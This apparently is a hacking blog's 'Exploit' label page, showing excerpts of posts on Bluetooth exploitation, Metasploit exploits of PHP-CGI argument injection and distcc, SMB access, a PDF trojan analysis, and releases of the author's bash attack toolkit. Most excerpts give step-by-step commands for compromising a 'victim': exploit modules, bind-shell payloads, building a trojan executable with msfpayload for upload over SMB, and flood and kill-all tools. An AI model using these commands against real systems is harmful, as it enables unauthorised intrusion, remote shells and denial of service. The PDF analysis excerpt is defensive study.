Posts

Showing posts with the label Exploit

Service And Device Class of Bluetooth

The following is a list of the Bluetooth device classes and service classes that can be used for Bluetooth exploitation.

1. Bluetooth device classes
AUDIO_VIDEO (Value: 0x00000400)
COMPUTER (Value: 0x00000100)
HEALTH (Value: 0x00000900)
IMAGING (Value: 0x00000600)
MISC (Value: 0x00000000)
NETWORKING (Value: 0x00000300)
PERIPHERAL (Value: 0x00000500)
PHONE (Value: 0x00000200)
TOY (Value: 0x00000800)
UNCATEGORIZED (Value: 0x00001f00)
WEARABLE (Value: 0x00000700)

2. Bluetooth service classes
AUDIO (Value: 0x00200000)
CAPTURE (Value: 0x00080000)
INFORMATION (Value: 0x00800000)
LIMITED_DISCOVERABILITY (Value: 0x00002000)
NETWORKING (Value: 0x00020000)
OBJECT_TRANSFER (Value: 0x00100000)
POSITIONING (Value: 0x00010000)
RENDER (Value: 0x00040000)
TELEPHONY (Value: 0x00400000)

HOW TO..??? hciconfig is used to configure Bluetooth devices. hci0 is the name of a Bluetooth device installed in the system. For help, use this command: hciconfig --help ...

Exploit php Injection obtain user Hashes

Hello all. Are you still loyal to my posts? :) On this occasion I will show a few ways for those of you who like to do penetration testing. As you know, a penetration test does not simply stop when it runs into a problem, so on this occasion I will share some of these issues so that we can overcome them. At this stage I will try to exploit the existing weakness in the CGI (Common Gateway Interface) for PHP (Personal Home Page) 5.x.x. Description: When run as a CGI, PHP 5.3.12 and up to version 5.4.2 is vulnerable to an argument injection vulnerability. This module takes advantage of the -d flag to set php.ini directives to achieve code execution. (You can find the complete information by typing info while using the module.) OK, now I will show you how :) Open Metasploit using the command: # msfconsole then type this command to use the module: msf > use exploit/multi/http/php_cgi_arg_injection msf exploi...

[Video] Local Exploit Privilege Escalation

Hey guys, tonight I will share how to get root privileges by exploiting the vulnerability that exists on the "distcc" machine. About distcc: distcc is designed to speed up compilation by taking advantage of unused processing power on another computer. How to: 1. Scan the target using the command: nmap -p 1-56635 -sS target-ip-addr then look for port 3633 (distccd). 2. Open Metasploit and enter these commands: msf > use exploit/unix/misc/distcc_exec msf exploit(distcc_exec) > set RHOST 192.168.1.10 RHOST => 192.168.1.10 msf exploit(distcc_exec) > set PAYLOAD cmd/unix/bind_ruby PAYLOAD => cmd/unix/bind_ruby msf exploit(distcc_exec) > exploit Wait until the command shell session is opened. 3. Then use these commands: uname -r (kernel version) whoami (print the user name associated with the current effective user ID). At this stage we do not have the root user ID, so let's start the privilege escalation. Make sure the ker...

Analyzing PDF Contains a Trojan

Introduction: On this occasion I will write up the stages of analyzing a *.PDF document to determine whether it is malicious or not. This happened some time ago when I tried to download a study guide book and the file was detected by the anti-virus that I use. This raised great suspicion, so I tried to analyze the file, and my guess was correct: the document contains JavaScript, and that script turns out to wrap a payload into the document. These are some of the steps that I took to analyze it. I will compare a clean PDF document with a document containing a trojan. Equipment: 1. pdfid 2. pdf-parser 3. pdftk ('apt-get install pdftk') 4. strings. In the first stage I will analyze the document "analysis.pdf", which is not infected by the trojan. OK, now let's go! Test a PDF file: # pdfid analysis.pdf In the output we only need to pay attention to the JS / JavaScript line, and it turns out that the output you ...

Minisplo1t v.2 Final RELEASE

Happy new year, happy new year =)) As promised in my previous post, today I am officially releasing Minisplo1t v.2. Screenshots of Minisplo1t v.2 Final Release: screenshot of Main Menu 1: screenshot of Main Menu 2: screenshot of Main Menu 3: screenshot of Main Menu 4: screenshot of Main Menu 5: I designed the tool using the bash scripting language, and it is open source, bro =)) I like open source =)) How to: Download the file by clicking the download button below and save it in the root directory. Extract the file: tar -xvf Minisploi-v2-Final.tar Install the configuration file: ./install.sh Start Minisploit: cd Minisploit-Final/ ./minisplo1t.sh DOWNLOAD Best regards, Hidemichi-Hiroyuki a.k.a [H2]

Exploit Samba PART II "Trojan Uploaded"

Before reading this post, it helps to read the first post: http://h2-exploitation.blogspot.com/2013/10/exploit-samba-smbclient.html In that post I discussed how the attacker obtained access rights to the shared folder over port 445. In the previous post the attacker could only access one folder and was not permitted to see the Users folder, the Windows folder, or other important folders. So, in this post we will see how the attacker gains full access rights like an admin. Equipment: 1. Smbclient 2. Metasploit 3. Netcat Connecting using smbclient: # smbclient //targetIP/Shared\ Folder -U ComputerName -p port [445] There are two files and one folder, but that does not satisfy me. Next I build a Bind TCP payload: # msfpayload windows/shell_bind_tcp LHOST=myIP LPORT=portListening X > Desktop/Cantik.exe After storing the payload in the Desktop directory, I disconnect from the victim host and then go into the Desktop director...

[RELEASE] Minisploit v 0.1

After a long time without posting on the blog, I am finally back with a simple tool written in the bash scripting language. I designed this simple tool to make testing easier for users of Linux pentest editions (Linux and BackTrack at the time). I do not know the bash language very well, so I'm sorry if the script is very bad. Categories:

1. Analysis
    1. Bluetooth Phone Attack
    2. FTP Attack
    3. SSH Attack
2. Stress Testing
    1. Crack Route
    2. Kill All
    3. Flood Mode
    4. Blacklist
3. Mini Exploit
    1. AutoPwn
        1. Addons Firefox
        2. Browser Autopwn
    2. Generate Payload
        1. Meterpreter Reverse Tcp
        2. Shell Bind Tcp

Extract the file: # tar -xvf minisploit.tar Set permissions: # chmod +x minisploit.sh Regards, Hidemichi-Hiroyuki a.k.a [H2]

Exploit Samba "SmbClient"

Like FTP (File Transfer Protocol), Samba covers things like getting files from the server to the local machine, putting files from the local machine onto the server, retrieving directory information from the server, and so on. In this case we need the victim to have shared folders or files. Equipment: 1. SmbClient 2. Nmap 3. Metasploit The first step: scan the victim's IP address for open ports using Nmap. The port we need here is port 445, microsoft-ds. # nmap (Victim Ip-Address) As seen in the picture above, I am lucky :) Now let us look at what is behind the port: # nmap -p445 --script=smb-os-discovery (Victim Ip-Address) --script=smb-os-discovery: attempts to determine the operating system, computer name, domain, workgroup, and current time over the SMB protocol (ports 445 or 139). As seen in the picture above, it turns out the victim uses the Windows 7 Ultimate operating system. The computer name and NetBIOS name are ANONYMOUS-...